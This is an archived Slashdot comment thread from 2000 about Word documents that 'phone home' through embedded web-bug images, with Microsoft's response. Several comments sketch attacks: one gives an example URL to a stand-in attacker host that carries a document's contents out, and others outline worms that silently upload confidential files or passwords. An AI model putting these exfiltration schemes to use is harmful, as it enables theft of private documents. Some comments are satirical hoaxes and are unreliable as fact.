Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 



Forgot your password?
typodupeerror
×
Privacy Your Rights Online

Microsoft Word Documents That "Phone Home" 317

ephraim writes "According to The Privacy Foundation, Microsoft Word documents have a 'feature' which allows the documents' creators to place web bugs within the documents that inform the author whenever somebody has opened the document via a web server's logging facilities. This 'feature' can also be used to set and view cookies on the reader's copy of Internet Explorer. The story can be found here. While this might be useful for tracking the distribution of confidential documents, it also raises serious red flags about privacy since most people probably aren't expecting their copy of MSWord to announce their reading habits every time they use it." Props to their CTO Richard M. Smith.

Here is what Microsoft had to say about it (emphasis added)...

Vendor Contact and Response

Microsoft was contacted about this issue on 8/4/00, and again on 8/25/00. They confirmed that Microsoft Word will access the Internet in order to fetch Web images that are linked to in a Word document. They went on to say that Word uses Internet Explorer to fetch images and therefore standard Web browser cookies can be both read and set from inside a Word document. However, the company claims that Word users can mitigate the use of cookies.

Regarding the potential use of Web bugs to track Word documents, Microsoft said that there is no evidence that such activities are occurring.

This discussion has been archived. No new comments can be posted.

Microsoft Word Documents That "Phone Home"

Comments Filter:
  • by donutello ( 88309 ) on Wednesday August 30, 2000 @09:38AM (#815275) Homepage
    If I distributed an HTML document which had references to images or other objects on some website, every user opening that HTML document would cause an access to that web site.
  • by tycage ( 96002 ) <tycage@gmail.com> on Wednesday August 30, 2000 @09:39AM (#815276) Homepage
    Regarding the potential use of Web bugs to track Word documents, Microsoft said that there is no evidence that such activities are occurring.

    Since it's not happening now, it couldn't possibly start happening later. I've never seen a problem with a MicroSoft product be exploited weeks, months, even years after it was released. Now I'll be able to sleep at night.

    --Ty

  • by FascDot Killed My Pr ( 24021 ) on Wednesday August 30, 2000 @09:39AM (#815277)
    So let me get this straight. Word can:

    -Run arbitrary macros
    -Access your hardware
    -Access the Internet
    -Download and upload data
    -Set and send cookies

    I'm beginning to think Microsoft is right: They don't know the difference between an app and an OS.

    Just to spell it all out: A Word macro virus now has the ability to, say, infect all your existing Word files such that when you open one of those files the contents are sent to a named address on the Internet. Goodbye confidential documents!
    --
  • Well so you have your VBS virus write a web bug into every created document. In this is the registry settings that hold your password stored in a cookie and anytime you open the document you have "sent" your passwords to the bug writer.

    Can we say hole the size of ... well the size of Windows.... :)
  • by Anonymous Coward
    It's nice to see Slashdot finally giving Microsoft some credit for their innovations. Usually you see articles about "Microsoft is screwing us" and "Boo Microsoft", but for once we're seeing a neutral description of a great Microsoft feature.

    Good job, Slashdot! Keep up the good work!

  • We shouldn't be too surprised; Web Pages are already like this.

    I remember the surprise that a friend of mine showed when I showed her "Apache Logs".

    Her first reply was, "HOW CAN I MAKE IT NOT DO THAT?!?"

    (This is a particularly paranoid friend of mine.)

    General rule of thumb: If you're doing something on the Internet, you're being logged.

    Do something useful: read "Transparent Society" [wirednews.com] and/or work on making yourself a more tolerant person, rather than fretting about your "privacy" (unaccountability).

  • by Erasmus Darwin ( 183180 ) on Wednesday August 30, 2000 @09:43AM (#815283)
    The difference is that embedded image tags within an HTML document are something that someone who's familiar with the technology expects. That's the whole point of a Hyper-Text Markup: it references other documents.

    Comparing a Word document retrieving arbitrary objects off the web to an HTML document retrieving arbitrary objects off the web is like comparing a shock from a defective toaster to a shock from sticking a fork in an outlet.

  • by Rurik ( 113882 ) on Wednesday August 30, 2000 @09:43AM (#815284)
    On the topic of Word: How hard is it to just have a simple word processor package?
    WTF does Microsoft have to insist on throwing every single bell and whistle that the 1%'ers want into the mix. People want a small, reliable processor to type up homework and reports.
    They went on the right track with their installation process, which splits up Word into it's vital components, and lets you choose which to install. But what good is that if it still installs components that you don't want, and don't trust on your machine (such as the topic)?
  • by GMontag ( 42283 ) <gmontag@guymontagDEGAS.com minus painter> on Wednesday August 30, 2000 @09:45AM (#815286) Homepage Journal
    If I distributed an HTML document which had references to images or other objects on some website, every user opening that HTML document would cause an access to that web site.

    And if you read *any* document with a ref to an outside object (like a one pixel .jpg) with *anything* that is web aware the exact same thing will happen.

    However, if you read the document in Wordpad or some other text only program you can avoid the effect. Makes for some pesky reading around markup and junk, but you will see the refrences to the web too.

    Visit DC2600 [dc2600.com]
  • Dont forget Excel and the rest of em...
  • by ch-chuck ( 9622 ) on Wednesday August 30, 2000 @09:46AM (#815288) Homepage
    what are those curious little dots that appear and disappear on /. as the page loads, like right above the banner ads?? Are we being web-bugged even as we talk about it?? :))

    However, looking at page source it looks like something to do w/ pagecount, but you got us wondering about any image w/ WIDTH=1 HEIGHT=1
  • The logging is bad enough (just because HTML does it doesn't make it OK). But combine that with the already known scripting "features" of Word and you have a recipe for disaster. Everyone who has Word installed has a generalized scriptable app open to the Internet. That's a big problem.
    --
  • by FIGJAM ( 29275 ) on Wednesday August 30, 2000 @09:47AM (#815290)
    When I am in Vindoz I use ZoneAlarm as a firewall which asks me if I want an application to access the Internet when an attempt is made. I have never had any Office component attempt this but I like knowing if and when Word or anything else tries...
  • Four words: Don't use Microsoft Word.

    That doesn't bode well with Bill Gates' World Domination Plan (tm).
  • Except that people don't expect word processing documents to be like web pages.

    Has anybody checked to see if the same thing happens in Excel?


    ...phil

  • by zlite ( 199781 ) on Wednesday August 30, 2000 @09:48AM (#815293)
    And they're *not* viewed in a web browser. Indeed, it's a good way to get an "opened" receipt when you send email (even if they choose not to acknowledge the usual "reciept requested" flag): embed a graphic from your own site and their client will automatically fetch it when they open the message. Cookies, too.

    Clever, but not new. Why the big MSFT-is-evil hype about this?

  • by Zan Thrax ( 53693 ) on Wednesday August 30, 2000 @09:48AM (#815295) Homepage
    WTF does Microsoft have to insist on throwing every single bell and whistle that the 1%'ers want into the mix?

    Because those 1%ers are the ones who buy the upgrade as soon as its available, and thus start the cycle of forcing others to upgrade to stay compatible with everyone else.
  • Props to their CTO Richard M. Smith

    Yes, good job RMS.

    Care about freedom?

  • The difference being that if you looked in the HTML source, you could find the offending link and fix it so that it does not reference the page. You could download it, and package it together with the HTML, modifying the reference so that other people will not hit the link. With the binary file format of Word, it's going to be hard to do this.
  • by Anonymous Coward
    There is also a feature built into Microsoft Word, which combines with these user tracking facilities. It is called the Predictive Artificial Neural Network Tracking System, and as the name suggests, it is a neural network built into Word. Once this ANN has harvested a sufficiently large list of people who have opened your Word document, it is actually able to predict who will open your document in the future - it is even able to predict when people you've never met before will open the document.

    Thus, this technology gives you the possibility to predict unauthorised access to your documents before it actually happens, thus enabling you to apprehend and punish the criminals _before_ they commit the crime. This technology is intended to be used in conjuction with the DMCA to prevent the unauthorised disclosure of confidential electronic documents. Slightly creepy, but very interesting technology nevertheless.

  • by jamiemccarthy ( 4847 ) on Wednesday August 30, 2000 @09:52AM (#815302) Homepage Journal
    We get this every so often. They're pagecounters, not web bugs. My traditional response is here [slashdot.org].

    Jamie McCarthy

  • by spudboy ( 36876 ) on Wednesday August 30, 2000 @09:55AM (#815304)
    Here's an actual reason to send your resume in Microsoft Word format -- you can track who at the company is reading it and when. Put a bullet graphic on your web site, hold your nose and go to Kinko's to save your resume in Microsoft Word format, and sit back and track it.

    "Hi, this is Bob. I'm applying for the Internet security position, and I'm calling about my resume which you're looking at right now on your Macintosh." Freak them out but get the job.

    Mapping IP addresses to user names and phone extensions is a simple matter of social engineering and common sense.
  • by the-banker ( 169258 ) on Wednesday August 30, 2000 @09:55AM (#815305)
    And you would never know if word tried, since it is the Internet Explorer compnent accessing the net, which I am sure you have granted access. Being a "necessary component of the OS" (their words, not mine) it will always be available, and chances are your firewall will never pick it up.
  • Word will use Internet Explorer to do this, which also means it will use IE's proxy settings. Just another good reason to use Junkbuster [junkbuster.com]. Of course, there's a very small chance the host images are coming off of are actually in your scookie.ini.

    --jb
  • by tealover ( 187148 ) on Wednesday August 30, 2000 @09:57AM (#815310)
    I hate the term "web bug". Actually, I'm more offended at the people who come up with these stupid terms rather than the potential abuse they bring about.

    I propose that we direct our energies to tracking and hunting down people who come up with these terms and sending them to Texas. I'm sure they'll know what to do about them down there.
  • See, I'm not one of those "all information deserves to be free" geeks who thinks that it is perfectly okay in all cases to spread copyrighted information all over the place. So I can support the concept of using this to track copyrighted documents in most cases.

    However, I can't stand the idea that outside of that limited arena that anyone can track the documents I read if they have any of these embedded graphics files. I have enough problems with cookies tracking how often I check certain web sites. This is intolerable. At the very least, it's an invasion of privacy, and the simple matter of 'turning off cookies' falls on deaf ears as most of the End Users won't know about this invasion of privacy or the need to turn off cookies.

    In any case, Microsoft is coming out of this looking like the bad guys again, and they _still_ can't differentiate between OS's and apps... :P

    Kierthos
  • Not everyone just wants a simple wordprocessor. If that's all you need, Notepad works rather well (or vi on a freeer system). High school students need to write reports. College students need to write reports, create lab reports (embedding charts, diagrams, etc) and other larger projects. Professionals need to create daily solutions (embedding diagrams, weblinks, using standard templates, using proofing tools on drafts, keeping version control, creating traceable requirement and design documents... the list goes on ad infinitum).

    Who wants to see Microsoft create a slew of about 150 products that do completely different things? I think that it's great that there are just a few flavors of productivity tools to choose from. They seem to be tailored pretty well to the needs of individuals, small businesses, enterprises, and us piraters that have the premium edition.

    The method of accomplishing such a comprehensive system like this is openness. Do you have any idea how easy it is to write an add-in for Outlook? There was an article in the July 2000 VCDJ (no link available) that showed very quickly how to create a full-featured add-in for Outlook. It allowed hooking into all sorts of notifications, adding buttons, getting to mail, etc... basically, really slick stuff.

    The price of this openness is that little exploits like this fall through the cracks. It's all a large balancing act where you decide what is necessary, and what risks are acceptable.

  • by Jeffrey Baker ( 6191 ) on Wednesday August 30, 2000 @10:00AM (#815315)
    ln -s `which strings` /usr/local/bin/word
  • I know that a lot of people enjoy bashing Micro$oft when a hole like this turns up in their products, but just for perspective, this will apply to any application that has sufficient integration. And as far as that goes, even the Privacy Foundation says that the integration is potentially useful and they recommend keeping it there. Just wait a little while; integration and component reuse is a very important feature of MS Windows, but Linux is catching up quickly. Soon we'll have this sort of problem also.
  • According to the message I received from Declan McCullagh [mccullagh.org] on the politech list [politech.org] which came directly from Richard M. Smith.
    A demonstration "bugged" document for Word 97 and Word 2000 has been set up at:

    http://www.privacycenter.du.edu/de mos/bugged.doc [du.edu]
    We also found that Excel 2000 spreadsheet files and PowerPoint 2000 slideshows can be "bugged" in the same manner.


    So yes, this would be applicable to some other MS apps. My solution, though I don't know if it will work well, would be to continue to use a program which asks me if I want other programs to access the internet. I'm pretty sure that it would catch word before it could get the image from a server. However, I can't guarantee that, this is Microsoft afterall, and we know how open their platform is :)
  • by Anonymous Coward on Wednesday August 30, 2000 @10:02AM (#815319)
    GNU emacs can do all of these things to (including harboring document virii). What's the diff?
  • Question: has anyone heard of Wild tangent? My router the other day started connecting to a website "update.wildtangent.com" out of the blue when I launched win98. I found the directory "wt" in windoze and uninstalled it. Funny thing is, I never agreed to install it AND after I did remove it IE slowed down A LOT when changing btw open windows. Just curious, because this seemed to be related to M$.

  • by blogan ( 84463 ) on Wednesday August 30, 2000 @10:05AM (#815325)
    I've notice some spam that would try to fetch a graphic from a website. They track your address in the image location so they know who's getting it and who isn't. We need a backwards firewall to prevent traffic like this from leaving.....
  • Is the versioning information that is often stored in Word documents. This allows "template" documents like contracts, offer letters, etc. to become sources of "extra" data if the originator starts with an existing version and overwrites it! This happened with me once. A co-worker got a copy-and-overwritten offer letter that had my specifics in it when he viewed it under vi.

    MORAL: Always start from clean documents (or turn the versioning off if you can)
  • In addition to the other response (image == web counter), 1 x 1 pixel images are also used for web page layout. It is (or was, at least) the only way to get certain things (like precise alignment) done in HTML. IIRC, CSS solves at least some of the problems.
  • I use a firewall, wich, by pure coincidencre, registered today. It's Zone Alarm Pro [zonelabs.com] and they have a [less featured, but functional] free for personal use. It's a very good one, IMO, as it detects when a program opens the winsock, and asks you if you should let that program access the net. It can remember your choice. I recommend it.

    So I got curious to see how it'd react to this. Downloaded the demo document from the article and, after opening the document, it told me Word was trying to access it.

    I simply didn't allow word to access the net (word was trying to contact 127.0.0.1, probably to IE).

    As I didn't grant access to word, it logged:
    ACCESS,2000/08/30,16:50:12 -3:00 GMT,WINWORD.EXE was temporarily not allowed to connect to the Internet (127.0.0.1).,N/A,N/A
    and the bug didn't work.
  • by tiny69 ( 34486 ) on Wednesday August 30, 2000 @10:07AM (#815332) Homepage Journal
    Who would have thought that the biggest threat to computer security would be a document. One of Office 2000's benefits is - "Web-enabled collaboration and information sharing." Link [microsoft.com]

    I can't wait to find out what other "innovation" gems are still out there.

  • by DreamingReal ( 216288 ) <dreamingreal@@@yahoo...com> on Wednesday August 30, 2000 @10:07AM (#815333) Homepage
    Hello everybody,
    My name is Bill Gates. I have just written up an e-mail tracing program that traces everyone to whom this message is forwarded to. I am experimenting with this and I need your help.

    Forward this to everyone you know and if it reaches 1000 people everyone on the list will receive $1000 at my expense.

    Enjoy.

    Your friend,
    Bill Gates

    Damn! This was totally true and I missed out!


    -------

  • On the contrary, if a document can access a url, a macro can build a URL containing the content of the document (at least, it could do it in parts, as a long document wouldnt probably fit in a 'get' method) Think, http://badass.hacked.com/recordfiles.cgi?from=your host.yourdomain.com&title=Confidential&p art=1&content=the%20first%20part%20of%20your%20doc ument

    have the macro embed like, 50 of these in image tags, and bingo, the thing just uploaded your document to an attackers system. It'd be even easier to do if the macro has the ability to do post methods.
  • by TheDullBlade ( 28998 ) on Wednesday August 30, 2000 @10:08AM (#815336)
    They don't know the difference between an app and a document.

    A=B=C -> A=C

    It logically follows that they don't know the difference between a document and an OS. There is further practical proof of this from the way you can open configuration windows from their help files.

    Ergo, the next version of MS-Windows will be called MS-Help. Instead of CTRL-ALT-DEL to log in, you'll use F1. Every time you want to type something in, you'll need to reassure your computer that you are indeed familiar with the operation of a keyboard, and probably still be forced to repeat the "This is the space bar. This is what we call the home row." tutorial every time you reboot.

    --------
  • That's why every time someone tries to fob this kind of thing off on the public, we need to make a stink about it. Joe sixpack isn't going to be interested enough in the details to realize how heinous it is until it's too late. So joe pizzabox hacker needs to find this stuff out and let the public know about it, and explain why its a bad thing.

    The EFF or some such group should probably have a project to uncover and track such nasties.

    Subscription software is a big enough pain, without all of the other skullduggery someone like M$ is likely to get into. At the very least, software publishers should be required to disclose such things and be severly slapped if they overstep their bounds. It's one thing if you decide to allow a piece of software to do this, it's another if it does it behind your back.

    Is there some way to set up a firewall to prevent or at least alert us to such things?
  • Since you can assume that your own Eord documents are under control (unless yet another virus has modified them in such a way that it includes those "web bugs"), you only have to despise other's documents.

    For a company, a simple fix is: don't use Word documents from outside - only accept Postscript or PDF.

    Which would be a good thing for us Lyx, [lyx.org] LaTeX or (insert non-MS office product here) users.

  • by tealover ( 187148 ) on Wednesday August 30, 2000 @10:15AM (#815347)
    I don't understand this. Why do you need to count pages based on the image? You have the damn web logs !! Why can't you just analyze the web logs? Your traditional response is lacking.

    I'm sure you won't respond to this because you never respond with anything more than your obligatory response.
  • by TheDullBlade ( 28998 ) on Wednesday August 30, 2000 @10:16AM (#815348)
    Why on earth do you even need them? I mean, you (the /. team) have full control of the server, right? So why use a goofy hack like 1 pel images?

    It seems to me that it's lazy and irresponsible to require an extra http request.

    --------
  • by Greyfox ( 87712 ) on Wednesday August 30, 2000 @10:19AM (#815355) Homepage Journal
    You could probably hack up some magic stuff to page you when someone opens your resume, too. After all, this technique would really only be effective if you catch them in the act.
  • Is there an option to disable this feature? I am unhappy with this.

  • With all these reports, is there a list that says
    • what a given version of a given software package does without the user confirming it (e.g. transferring GUID's like it is the case in some versions of the Windows Media Player)?
    • what is stored in documents what you wouldn't want to be there (e.g. Word DOC files and its fast-save feature that has multiple versions of the same document stored)?
    • what is auto-executed after have been transferred to one's computer (e.g. Outlook macro features)?

    One could then simply compare the list of installed software at home or work, best with hints on how exactly to turn things off or what replacement version to install. Previewing my comment I see that I only gave MS software examples, I'm aware that they're not the only ones screwing things up ;-)
  • by rlk ( 1089 )
    Suppose the Word virus were to, say, search for a particular string in each file on your disk, and if it finds it, insert a URL containing that string, or the context surrounding it. Then whenever someone opens that document, the URL gets sent to the hostile server. There's a limit of about 1K (I think) in an actual URL, but that still allows for a fair bit of data. If multiple web bugs are embedded, of course, it's possible to send across even more data.
    Remember that the web bug doesn't actually have to correspond to a real file on the hostile server; it just has to be something that the hostile server understands.
  • I haven't looked for this [moderating of cookies], but typically junk like this comes enabled and the user has to:

    Find out about the feature

    Query Help for about an hour to find out how to moderate

    Find it shipped enabled and then disable it

    Probably my greatest annoyance with M$ products is this type of behavior. It usually costs me hours to find and disable all the annoying "features", particularly because M$ doesn't use the same terminology the rest of the world does, so it's non-obvious. Then the on/off button is deeply buried in a non-obvious location. There's a name for people who design things like this: a$$hole.

    Vote [dragonswest.com] Naked 2000

  • by Myddrin ( 54596 ) on Wednesday August 30, 2000 @10:24AM (#815362) Homepage
    Easier than that. It can the word macro
    could just access the internet capabilities of
    IE3.0 and above and ftp a file where-ever you
    want.

    Since it's known that IE is installed on almost
    every machine (and that it's an activex component)
    makes it just sooooo easy to say upload an entire
    harddrive to a given site....

    Or barring that, I'm sure there's some activex
    exploit that could be used to install the internet
    activex control that ships with vb(especially since activex controls signed by microsoft are automatically trusted until the user says they aren't anymore... then the sky is the limit!
  • ... if the internet happens to be accessed via another application, namely Internet Explorer, which you expect to access the internet and thus are likely not to block?

    Because that is (according to the article and MS's statement) what actually happens.
  • Or don't read your mail in Netscape. I've recently discovered VM for Xemacs, which gives me all the features I need -- POP, IMAP or direct mail, you can change your address (Handy for non-static POP accounts and my biggest complaint with PINE,) flexible address book handling, real PGP/GPG support (With a menu drop-down added in, even!) MIME handling, folders, and so forth. Plus some stuff I never had before like xfaces, which is pretty damn spiffy.
  • In addition to the other response (image == web counter), 1 x 1 pixel images are also used for web page layout. It is (or was, at least) the only way to get certain things (like precise alignment) done in HTML.

    Typical tired response is that images of such dimensions for pixel-perfect placement is usually (these days) done to get around Netscape not honoring table cell height and widths for cells lacking content -- workaround here is to use the proprietary Netscape SPACER tag in place of images for pixel-perfect layout.

    Tired response #2 is that this is not quite the same thing as a 1x1 buglet, as the dimensions involved are those *represented in the HTML* and not the *actual dimensions* of the linked image. In order to know the latter, the client/recipient would have to download the image in question -- instant logging activity. To effectively block buglets in advance, you would have to know that it is a buglet (1x1 dimensions) by looking at the markup HEIGHT and WIDTH hints and guessing that the image(s) in question are buglets before making the request for them.

    Unless the pixel-perfect layout you seek is in nice 1x1 chunks -- not a 1x1 transparent GIF stretched using HEIGHT and WIDTH to arbitrary dimensions -- the level of identity between 1x1 web bugs and your general purpose 1x1 shim image cannot be ascertained without requesting the image and verifying its dimensions.

    Of course, the web bug functionality is probably better served by using a lightweight, "real" image (for example, a closing horizontal rule or company logo) and not something as obvious as a 1x1 graphic pasted on to the end of a document, page, or HTML mailing

  • You DO realize that PostScript is a computer language don't you? If you're viewing it with safe turned on, it's slightly better, but it's still a computer language and offeres all the chances to do nasty evil things with it.

    When I was playing with PostScript, I always wanted to come up with a PostScript worm that would propigate from printer to printer and once there, scan for the word "strategic" and replace it with the word "satanic." If I'd been able to figure out how to open a network socket in the language, I could have pulled it off too...

    TeX/LaTeX are also computer languages, allowing at least for conditionals and possibly looping as well (I never got THAT much into them.) They read kind of like LISP without the parentheses.

    While I'm not aware of any actual instances, the potential for mayhem is there.

  • On the topic of Word: How hard is it to just have a simple word processor package?
    When you're using your hypothetical "simple word processor package", do you ever plan to use charts, or tables, or graphics? You probably do. Now, there are two ways that developers can add that sort of feature. They can write a complete spreadsheet/chart/graphics package from scratch, and #include it in the word processor... or they can create a mechanism that allows objects from other programs to be embedded in your document.

    Regardless of the security implications, no sane programmer would chose the former method. It wastes time, it makes the UI inconsistent, it bloats the code, and it creates many more opportunities for bugs. Even if those limitations aren't a problem, it would still never happen, because good programmers would sooner quit than be forced to cut-and-paste code (instead of using shared libraries.)

    Microsof chose the latter option. All "active documents" can contain elements from any other COM object provider. The "downside" of this is that Office programs are now "too flexible" for many Slashdot types. IMHO, for the reasons above, I think that this is a fair trade-off.
  • by Fervent ( 178271 ) on Wednesday August 30, 2000 @10:34AM (#815374)
    How is this a problem? Corporations for years have been tracking users opening certain files, and with the built-in features of macros and internet access in most office suites (StarOffice and WordPerfect included) isn't this the same thing?

    MS just took the next logical step. They built a feature into the application that programmers had been scripting into it for years.

  • Once again we have an example which I think points our need for more fine-grained access control. We need to be able to limit what apps other applications may run/interface with, and we may also want to a way to have inherited limits. I don't want most programs being able to send mail, I want them locked out unless I give them permission. I'm not sure of the technical details of implementing this, but if we want truly safe computers, this seems like the only way to me.
  • Gee.. Perhaps because images.slashdot.org isn't slashdot.org? It makes analysis of the weblogs easier if you were to shut up and think . Consider the following:

    The crew wants to count the page hits. How can you do that? Every time a main page is generated by the Perl? Bzzt, that doesn't work, way too expensive. This place serves more pages/min then I'd ever care to count, and I damn well wouldn't want a script counting it for me every time it's used.

    The main page is dynamic too, so you can never be sure how many images will be loaded, so there goes analysis through that means.

    Beyond that, just counting the number of hits against the '/' isn't accurate because of incomplete page loads, etc. If you put a small image in there, chances become that if that image is loaded, the rest of the page was too.

    Bang, you can suddenly count, far more accurately, the total number of completed page loads. It's a totally controlled variable. It is appended to the logs by the web server, not by some script. What could be better?

    Now, this is all speculation, but I put this together in my head after no less then 5 minutes of thinking. Maybe you should try that too. Besides which, they are images loaded from /.'s servers, so how could they possibly be malicious?? It's their page. If they want to put 1x1 images after every third word, it's their perogative to do so.

    So even if they have no reason to be there, that's no reason, not a bad reason. Logically, there can't be a bad reason.
  • From their FAQ (See it here . . . [wildtangent.com]):

    Who is WildTangent?
    Former Microsoft Multimedia evangelist and DirectX creator, Alex St. John, and his partner Cambridge mathematician Jeremy Kenyon founded WildTangent Inc. in June 1998. WildTangent pursues the vision of building a richer more communicative Internet experience through the use of 3D graphics, sound, animation, and interactivity.

    and

    How did the web driver get installed on my system?
    Our web driver provides advanced multimedia capabilities to your web browser. It was installed by a product that needed its services, such as one of our music visualizers, screensavers, or games. It could also have been installed when you visited a web page or by a third party product. In all cases, the web driver announces its installation through a series of licensing screens. If you missed this information, you can view our license agreement or our privacy statement.

    -------

  • Adding these types of things would be essentially trojan programs. Same thing as ad-trackers using cookies I would like to see some of these companies that use this type of things as basis of a charge under the computer tresspass act.
  • Because anyone who wants to stay up-to-date on security problems with any Linux application can simply stay on the appropriate mailing list and find out when an update patch is available. Microsoft is a different phenomenon, and thus requires different media coverage. Also, the X-Chat vulnerability announcement comes with a fix, the Microsoft Word one is a continuing, acknowledged problem that will likely not be fixed, thus it becomes newsworthy.
  • Actually they make plugins for winamp among other things. But of course I'm sure MS forced you to install it. I have an idea, why don't you start a class action suit? That way you can get past all the pain and suffereing you were caused when you found that evil wt folder on your harddrive.
  • Ahhhhh..but perhaps you have the documen run finger and get you all the particulars on the person who's reading your resume AND then send it to your pager.

    Great stuff if your applying for a security position...scare them into hiring you.

    RD
  • Her first reply was, "HOW CAN I MAKE IT NOT DO THAT?!?"

    FilterProxy [wisc.edu] can successfully remove web bugs.

    This message has been brought to you by Blatent Plug-O-Matic(tm)

    --Bob

  • This weeks' Computerbild has a story about a new virus sniffing SBS (a Swiss bank) e-banking usernames and passwords using a similar technique. This is scary stuff, as real money is involved. Wanna bet that this e-banking service was marketed as "100% secure, because Bill Gates himself said so"?
  • It is trivial to add a web bug to a .pdf document, too. This security "feature" is not limited to Microsoft products.

    The only solution is to accept only plaintext, and to only open plaintext documents on old computers that were headed for Asset Recovery anyway, and which are not connected to the Net.

    And to never leave your home or get in the bathtub or eat anything but cabbage.
    --

  • reminds me of YT's mom in her goverment job, making sure to take 18 minutes to read a given document...

    --

  • ... an Outlook+Word worm that uploads every document from the local C: drive, and from any shared network drives to a Web site. Or better: that posts them to Usenet (pointing a Worm to Web site is stoopid, as
    1. the web site can be shut down too easily
    2. it gives away your identity
    ). Or even better: only upload those documents that contain the words company confidential, for internal use only, trade secret or series of long numbers that look like bank account numbers. That way, you make better use of bandwidth.

    Ouch, that would hurt. Better buy those MSFT puts right away...

  • But since I use Opera, whenever IE wants to access the internet (usually, strangely enough, when I start it by mistake) I usually go NONONONONONONONONONONONONONO, and then press the No button.

    I am, however, worried as hell when my connection lights are flashing like the dickens and the ZoneAlrm graph stands still. I complained to my ISP, and they say it's RIP (!). Good thing I'm not actually paying for service...
  • Well, Microsoft knows that others aren't using Web bugs to track Word documents, because they've set it up so that they can track all Word documents with Web bugs.

    It was part of the fine print in the User Agreement that says " All content created with Microsoft Word belongs to Microsoft, and will be tracked accordingly."

  • Earnest question here:

    My understanding is that my IP address is dynamically assigned when I connect -- it's not the same from session to session.

    So what is gained from a web bug other than the knowledge of which ISP I'm using?

    It's not like my computer name (tacogato) would tell them anything. The ISP doesn't have my address, so a web bug can't get it either unless they can convert the IP to phone number and then reverse lookup to get my address. Is any of this possible? Or is this only a concern for those with static IP addresses?

    What about small businesses, often using a shared modem setup? Do they generally have static IPs? If not, it seems the web bug is not broadyly useful.

    Could someone enlighten me please?
    -----
    D. Fischer
  • How about in a keyboard driver, like HP's latest? Any executable has the potential of networking, so people should slowly get used to this idea. One solution might be to have a kind of application firewall inside the OS, which lets you determine which apps should be allowed socket communications, and which not. And to be informed when an app tries to open a socket.

    Uwe Wolfgang Radu
  • The main difference is that it's quite easy to see the source of an HTML document and so to spot the webbug.
  • One year? That is a helluva lot of time. Melissa and I love you were discovered within days, if not hours. Every single computer will have been cleaned before your virus activates...
    unless...
    you make yours much more discrete than Melissa and Iluvu. Do not mail yourself to every address book entry. No, just hook yourself into MAPI, and silently infect outgoing messages which the user sends. But only do it if the intended receiver has Outlook too (easy to find out by scanning the inbox and the archive for the last message by that user and looking at its headers). Even with this slow spread, one week should be enough to acquire a sizeable target market. One day before activation, go into "fast mode", and fire off automatic messages to all users who recently mailed us, and who have outlook. Subject would be Re: Subject of last received messages. Text would be entire quoted text of last received message. And then, let that puppy bark [slashdot.org].
  • Malda has admitted that those "web bugs" are there at Andover's behest. I bet the slashdot crew isn't even administering tht box. Who the hell knows what the Andover people are doing.
    Link please, or I'll be forced to call bullshit on you. Besides which, do you honestly have a better explination then me? You can't call it a 'web bug' because the definition of a 'web bug' is something that is stored on a different site then the page in question.

    By your logic, any webpage with a 'counter image' or any image whatsoever has 'web bugs' in it. As I said, if I was managing /., that would be the smartest way to keep a webcounter. A totally controlled variable that can be easily grepped out of the logs.

    And look, I managed to make a coherent argument without resorting to name-calling. You still have yet to do that. Sod off.
  • What's the big deal? How many Word documents does anyone write that they distribute? How many Word documents written by someone else do you read? Who cares if the original author knows you are reading the document? Why would you be reading a Word document from an untrusted source anyway?

    what we should really be worried about is this part:

    This issue is potentially critical for music file formats such as MP3 files where piracy concerns are high. For example, it is easy to imagine an extended MP3 file format that supports embedded HTML for showing song credits, cover artwork, lyrics, and so on. The embedded HTML with embedded Web bugs could also be used to track how many times a song is played and by which computer, identified by its IP address.

    so there could eventually be Trojaned mp3 floating on Napster someday. Only way to avoid this would be to never upgrade Sonique, Winamp, or Media Player again...


    JOIN !LINK CLUB! [slashdot.org]
  • by baka_boy ( 171146 ) <lennon@@@day-reynolds...com> on Wednesday August 30, 2000 @11:24AM (#815425) Homepage
    Microsoft, like any software design group, has the right to make a design choice favoring code reusability over security. In my opinion, though, they've screwed up here by not making clear to their users the potential implications of a choice made when designing the application. The "user friendly" interface and widespread distribution of Microsoft productivity applications contributes to their appearance of being "safe", while the flexibility of the components makes them very powerful.

    The average user of MS Office knows their way around the interface, and may even be able to throw together a few quick-and-dirty macros, but they are by no means an experienced object-oriented programmer, or a distributed systems designer. They will not expect to have to check every Word processing document they receive for potential security risks; nor will they automatically run any filtering or TCP/IP monitoring software. Hence, there will continue to be millions of computers comprimised to attackers on a regular basis.

    I have little symphathy for system administrators who fail to take basic precautions like changing default passwords or disabling unneeded services -- that's their job, and they should know better. However, I don't expect the same level of dilligence from an inexperienced user who's trying to type view a business letter sent to them from outside the office. Microsoft distributes even their "basic" productivity applications with all the functionality of a basic operating system, makes that power easy to harness (for whatever purpose), and demonstrates little more to their average user than how easy it makes dragging and dropping a spreadsheet chart into a business report. That's irresposible and misleading.

  • Umm, what's the big deal?

    It came installed with something you installed on your system. If you're the type that habitually ignores license screens and just blindly clicks Next when you install stuff, you deserve what you get.

    Are you really that concerned that this piece of software is contacting an updates server? Do you have any idea how much software nowadays does this sort of thing? Why is it everyone considers a piece of software that, behind the scenes, checks to see if there are updates of itself an "evil" piece of privacy-invading software? It just seems silly to go through the effort of setting up things like firewall filters just because you don't "trust" what this piece of software is doing. If you really don't trust it, why the hell are you installing it? If you're going to say, "But I didn't know I was installing it!", something else you apparently do trust did install it, so perhaps some trust relationships there need to be looked at.
  • The problem at hand here is not being logged when we visit webpages. You could be logged just by opening an innocent looking Word document. BEsides with a webpage you can always look at the source and see there's a webbug...

    Who knows, maybe you even read some Word documents infested with those webbugs already.
  • People want *professional* level tools, even when they're not professionals.

    JASC Paintshop Pro is overkill for most people's graphics needs. It sells for what, a hundred bucks? Yet Photoshop is pirated like mad -- *not* because it's better, but because it's considered professional-grade. Joe Blow will never use 1/3rd its features... but it's what he wants.

    The same applies for wordprocessors.

    Unfortunately, what most people don't seem to realize is that there's a whole level of professionalism that's quite apart from the level of marketing.

    One thing that frustrates me is that so many products are de-facto standard not because they are superior, but because they were well-marketed.

    Corel has a suite of applications that is superior to the competition in almost every way:
    * by most accounts, CorelDraw is better than Illustrator, Freehand and PageMaker.
    * by many accounts, WordPerfect is superior to MS-Word.
    * by all accounts, Ventura Publisher is superior to Quark and FrameMaker.

    PhotoPaint versus Photoshop seems to be the only upset to Corel's domination on the basis of functionality and ease-of-use.

    Yet Corel is sinking like a stone, while these other inferior products continue to maintain de-facto status.

    It bothers me, 'cause I *hate* using inferior tools just because they're popular!

    Er, anyway, rant off. My point is: people don't want simple or minimalist. They want *professional* tools. Even if they are overkill.


    --
